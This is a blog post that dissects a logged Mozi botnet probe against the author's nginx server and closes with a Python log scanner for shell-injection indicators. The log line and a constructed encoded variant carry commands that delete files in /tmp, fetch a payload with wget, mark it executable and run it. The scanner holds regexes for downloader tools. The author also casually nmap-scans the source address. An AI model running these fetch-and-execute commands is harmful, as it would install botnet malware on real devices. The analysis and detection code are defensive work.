Name + shaming malicious bots and actors
After looking through my nginx access logs, I realized it would be fun and insightful to show in-the-wild hacking attempts against this server.
Whenever I see interesting attempts, I'll post them here with the log entry and a brief description of what they were trying to accomplish, why it didn't work, and other interesting takeaways.
To start, here's a recent one:
120.59.127.164 - - [10/Sep/2020:19:00:49 +0000] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://120.59.127.164:52890/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 178 "-" "Hello, world"
Let's do some recon on our malicious friend. According to ipleak.net, the IP address seems to be located in India. Not very insightful information, but it's a start. No luck on VirusTotal either.
Looking at the URI string, the Mozi.a file seemed like a good clue to chase. After a quick DuckDuckGo search, I realized the Mozi.a file actually relates to a malware family that originated in late 2019.
According to CenturyLink's NetNext blog, the malware appears to be targeting IoT devices. Here's a quick description of the bot/malware behavior:
The Mozi botnet is comprised of nodes that utilize a distributed hash table (DHT) for communication, similar to the code used by IoT Reaper and Hajime. These nodes also host the Mozi.m and Mozi.a malware binary files, passed during the compromise of new hosts, on a randomly chosen port. The standard DHT protocol is commonly used to store node contact information for torrent and other P2P clients. Using DHT allows the malware to bypass the use of standard malware command and control servers while hiding behind the large amount of typical DHT traffic. This makes it harder to track and impact the control infrastructure. As a P2P botnet, Mozi implements its own custom extended DHT described later.
URLhaus lists the hash of the file and a link to its VirusTotal entry, where it shows up as clearly malicious. Anyway, the intent of this request was to drop malware and connect back to its C&C server. At the time of writing this, I attempted to download the file for analysis but was not able to:
# wget http://120.59.127.164:52890/Mozi.a
--2020-09-11 16:52:01-- http://120.59.127.164:52890/Mozi.a
Connecting to 120.59.127.164:52890... failed: Connection refused.
Firewalled off? Compromised server was cleaned? Who knows.
I wish I had the actual file because it would be fun to analyze whether the C&C server was an old one, most likely taken down by now, or a fresh one. Oh well, we'll leave that up to the pros like @malwrhunterteam.
This raises the question: was the request made by a compromised device, perhaps a member of the botnet itself? Considering the IP address came back clean on VirusTotal, maybe it was only temporarily compromised.
After running an nmap scan (this blog hacks back! jk, but seriously), the scan came back with no open ports, so either their firewall is blocking the scan or they really don't have any ports open.
Why did the attempt fail?
The attack failed because the commands in the URI were never handed to a shell: nginx treated /shell as an ordinary path, found nothing there, and answered with the 404 you see in the log entry. Kind of a bad attempt in my opinion, as they didn't even bother to try encoding their commands. Encoding technique examples can be seen on OWASP. Shout out to OWASP!
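As an added example that is not part of this post: a small Python scanner over constructed nginx combined-format log lines (the first mirrors the Mozi probe above; the other addresses are from the RFC 5737 documentation ranges). It URL-decodes the request URI before looking for shell-injection indicators, so an encoded variant of the same probe is flagged just like the plain one.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample log in nginx "combined" format. Line 1 mirrors the Mozi
# probe from the post, line 2 is a URL-encoded variant of the same idea,
# line 3 is a benign request.
SAMPLE_LOG = """\
120.59.127.164 - - [10/Sep/2020:19:00:49 +0000] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://120.59.127.164:52890/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 178 "-" "Hello, world"
203.0.113.7 - - [11/Sep/2020:02:13:05 +0000] "GET /shell?cd%20%2Ftmp%3Bwget%20http%3A%2F%2F203.0.113.7%3A4444%2Fx.sh%3Bsh%20x.sh HTTP/1.1" 404 178 "-" "Hello, world"
198.51.100.4 - - [11/Sep/2020:08:00:00 +0000] "GET /posts/nginx-logs.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

# Parser for the combined log format: ip, ident, user, [time], "request", status, size, "referer", "ua".
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\d+|-) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Indicators are matched against the *decoded* URI, so %3B and + do not hide anything.
INDICATORS = {
    "shell_separator": re.compile(r"[;|&`]"),
    "downloader": re.compile(r"\b(wget|curl|tftp)\b"),
    "exec_prep": re.compile(r"\bchmod\s+\S+|\bsh\s+\S+"),
    "tmp_path": re.compile(r"/tmp/"),
    "known_payload": re.compile(r"\bMozi\.[am]\b"),
}

def parse_line(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None

def classify_uri(uri):
    """Decode the URI and return (decoded_uri, list of indicator names that fired)."""
    decoded = unquote_plus(uri)
    return decoded, [name for name, rx in INDICATORS.items() if rx.search(decoded)]

def scan_log(text, threshold=2):
    """Flag requests whose decoded URI trips at least `threshold` indicators."""
    findings = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        decoded, hits = classify_uri(rec["uri"])
        if len(hits) >= threshold:
            findings.append({"ip": rec["ip"], "status": rec["status"],
                             "decoded_uri": decoded, "indicators": hits})
    return findings

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["ip"], f["status"], f["indicators"], f["decoded_uri"])
```

Requiring two indicators keeps a lone ";" in a legitimate query string from raising an alert, while the decoded Mozi line trips all five.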